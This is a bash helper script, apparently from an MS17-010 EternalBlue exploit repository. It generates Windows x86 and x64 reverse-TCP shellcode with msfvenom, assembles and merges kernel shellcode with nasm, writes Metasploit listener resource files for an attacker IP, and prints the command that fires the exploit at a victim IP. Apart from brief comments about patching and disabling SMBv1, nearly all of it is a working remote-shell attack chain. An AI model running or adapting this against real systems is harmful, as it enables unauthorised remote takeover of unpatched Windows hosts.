start.sh
#!/bin/bash
# start.sh — helper that assembles the x86 and x64 kernel-shellcode blobs used
# by this repository's MS17-010 exploit script and writes two msfconsole
# resource (.rc) files for the matching exploit/multi/handler listeners.
#
# Inputs (edit the four assignments below): attackerIP, vulnerableIP,
#   arch_x86_port, arch_x64_port.
# External tools invoked: msfvenom, nasm, python (merge_shellcode.py next to
#   this script).
# Side effects: deletes and recreates ./output and ./bin under $PWD, and
#   removes the previous nasm output files beside assembly/*.asm.
#
# Defensive context: the chain this script prepares depends on the SMBv1 flaw
# closed by the MS17-010 update; applying that update (or disabling SMBv1) is
# the mitigation. On the wire, the payloads built here are reverse TCP shells
# that connect back to attackerIP on the two ports configured below, and the
# artifacts left on the operator box are the .rc files under output/ and the
# .bin files under bin/.
#
# NOTE(review): there is no `set -e` and no exit-status checking anywhere in
# this script, so a failing step does not stop the later steps.
# change these values to your attacking IP and 2 ports for 32bit/64bit Architecture
attackerIP=192.168.2.133 # put your ip here*
vulnerableIP=192.168.2.253 # put the victim ip here*
arch_x86_port=4444 # x86 msfconsole multi handler port (optional change)
arch_x64_port=5555 # x64 msfconsole multi handler port (optional change)
# Some nice colours cause... who the hell likes a dull terminal
# ANSI SGR escape sequences. They are expanded inside printf *format* strings
# further down; that is only acceptable because every one of them is a
# constant defined here (never put runtime data in a printf format).
BLACK='\033[0;30m'
DARKGREY='\033[1;30m'
RED='\033[0;31m'
LIGHTRED='\033[1;31m'
GREEN='\033[0;32m'
LITEGREEN='\033[1;32m'
BROWNORANGE='\033[0;33m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
LIGHTBLUE='\033[1;34m'
PURPLE='\033[0;35m'
LITEPURPLE='\033[1;35m'
CYAN='\033[0;36m'
LITECYAN='\033[1;36m'
LITEGREY='\033[0;37m'
WHITE='\033[1;37m'
NC='\033[0m' # No Color
# Start from empty output/ and bin/ directories under the current directory.
# NOTE(review): $PWD is unquoted here and below; a working directory whose path
# contains whitespace would be split into several words, so run this from a
# plain path.
rm -rf $PWD/{output,bin}
mkdir -p $PWD/{output,bin}
# Metasploit console helper files.. cause who the hell likes typing this stuff
msfconsoleX64File=$PWD"/output/EternalBlueX64.rc"
msfconsoleX86File=$PWD"/output/EternalBlueX86.rc"
# binary files generated by metasploit
x86_msf_shellcode=$PWD"/bin/sc_x86_msf.bin"
x64_msf_shellcode=$PWD"/bin/sc_x64_msf.bin"
# per-architecture result: nasm stub followed by the msfvenom payload (steps 5/6)
x86_shellcode=$PWD"/bin/sc_x86.bin"
x64_shellcode=$PWD"/bin/sc_x64.bin"
# all our shellcode successfully compiled
all_shellcode=$PWD"/bin/sc_all.bin"
mergeScript=$PWD"/merge_shellcode.py"
# base file name of Worawits raw Assembly.
# The .asm sources are $rawAssembly_*.asm; the extensionless names are the
# nasm output files.
rawAssembly_x64=$PWD"/assembly/eternalblue_kshellcode_x64"
rawAssembly_x86=$PWD"/assembly/eternalblue_kshellcode_x86"
# remove all dynamically generate files to start fresh!
# Only the extensionless nasm outputs are removed; the .asm sources are kept.
rm $rawAssembly_x64 $rawAssembly_x86 2>/dev/null
printf "${LITEGREY}##############################################################\n"
printf "#################### MS17-010 SMB EXPLOIT ####################\n"
printf "####### Generating Shellcode for x64 + x86 EternalBlue #######\n"
printf "################ x86 exploit uses Port: $arch_x86_port #################\n"
printf "################ x64 exploit uses Port: $arch_x64_port #################\n"
printf "##############################################################${NC}\n\n\n"
printf "Step 1 of 7..\n"
printf "${RED}1. GENERATING MSF SHELLCODE x64${NC}"
# Raw x64 reverse-TCP payload written to $x64_msf_shellcode. msfvenom's stderr
# is discarded and its exit status is not checked, so a failure here is not
# detected by the script.
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o $x64_msf_shellcode EXITFUNC=thread LHOST=$attackerIP LPORT=$arch_x64_port 2>/dev/null
printf "\n\n"
printf "Step 2 of 7..\n"
printf "${GREEN}2. GENERATING MSF SHELLCODE x86${NC}"
# Same as step 1 for the 32-bit payload, using the x86 listener port.
msfvenom -p windows/shell_reverse_tcp -f raw -o $x86_msf_shellcode EXITFUNC=thread LHOST=$attackerIP LPORT=$arch_x86_port 2>/dev/null
printf "\n\n"
printf "Step 3 of 7..\n"
printf "${PURPLE}3. GENERATING nasm SHELLCODE x64${NC}"
# No -o is given, so nasm writes its default output name (the source name
# minus .asm), i.e. $rawAssembly_x64, which step 6 reads.
nasm -f bin $rawAssembly_x64.asm
printf "\n\n"
printf "Step 4 of 7..\n"
printf "${CYAN}4. GENERATING nasm SHELLCODE x86${NC}"
# Produces $rawAssembly_x86 the same way, read by step 5.
nasm -f bin $rawAssembly_x86.asm
printf "\n\n"
printf "Step 5 of 7..\n"
printf "${YELLOW}5. Combining nasm and MSF SHELLCODE to x86 binary${NC}"
# Plain concatenation: nasm output first, msfvenom payload second.
cat $rawAssembly_x86 $x86_msf_shellcode > $x86_shellcode
printf "\n\n"
printf "Step 6 of 7..\n"
printf "${LITECYAN}6. Combining nasm and MSF SHELLCODE to x64 binary${NC}"
cat $rawAssembly_x64 $x64_msf_shellcode > $x64_shellcode
printf "\n\n"
printf "Step 7 of 7..\n"
printf "${BLUE}7. Finally Combining all of our binaries into 1 beast shellcode file for all architectures${NC}"
# merge_shellcode.py (not shown here) takes the two per-architecture blobs and
# writes the combined $all_shellcode; its layout is defined in that script.
python $mergeScript $x86_shellcode $x64_shellcode $all_shellcode
printf "\n\n"
printf "${CYAN}Creating x86 MSF quick launch file..${NC}\n\n\r"
# Build the x86 handler resource file line by line. `>>` appends, but the file
# is always new because output/ was recreated above, so no stale lines remain.
touch $msfconsoleX86File
echo "use exploit/multi/handler" >> $msfconsoleX86File
echo "set PAYLOAD windows/shell_reverse_tcp" >> $msfconsoleX86File
echo "set EXITFUNC thread" >> $msfconsoleX86File
echo "set ExitOnSession false" >> $msfconsoleX86File
echo "set LHOST $attackerIP" >> $msfconsoleX86File
echo "set LPORT $arch_x86_port" >> $msfconsoleX86File
echo "exploit -j" >> $msfconsoleX86File
printf "${CYAN}Creating x64 MSF quick launch file..${NC}\n\n\r"
# Same for the x64 handler; payload and port match step 1.
touch $msfconsoleX64File
echo "use exploit/multi/handler" >> $msfconsoleX64File
echo "set PAYLOAD windows/x64/shell_reverse_tcp" >> $msfconsoleX64File
echo "set EXITFUNC thread" >> $msfconsoleX64File
echo "set ExitOnSession false" >> $msfconsoleX64File
echo "set LHOST $attackerIP" >> $msfconsoleX64File
echo "set LPORT $arch_x64_port" >> $msfconsoleX64File
echo "exploit -j" >> $msfconsoleX64File
printf "FINISHED!!!!...\n\n"
# Everything below only prints follow-up instructions; nothing else is run.
printf "${RED}Usage INSTRUCTIONS${NC}\n"
printf "Now you need to open 2 terminals and execute the following to active metasploit listeners..\n"
printf "for both x86 and x64 OS Architectures. If you already know the Systems Arch then you can just\n"
printf "use the following relevant metasploit run file we generated.\n"
printf "\n\n"
printf "${LITECYAN}For x64 bit Architecture: ${NC}"
printf "msfconsole -r \"${msfconsoleX64File}\""
printf "\n\n"
printf "${LITECYAN}For x86 bit Architecture: ${NC}"
printf "msfconsole -r \"${msfconsoleX86File}\""
printf "\n\n"
printf "${PURPLE} Now exploit using the Windows 7 script by running this: ${NC}\n\n\n"
printf "python $PWD/eternalblue_exploit7.py $vulnerableIP $all_shellcode 3\n\n"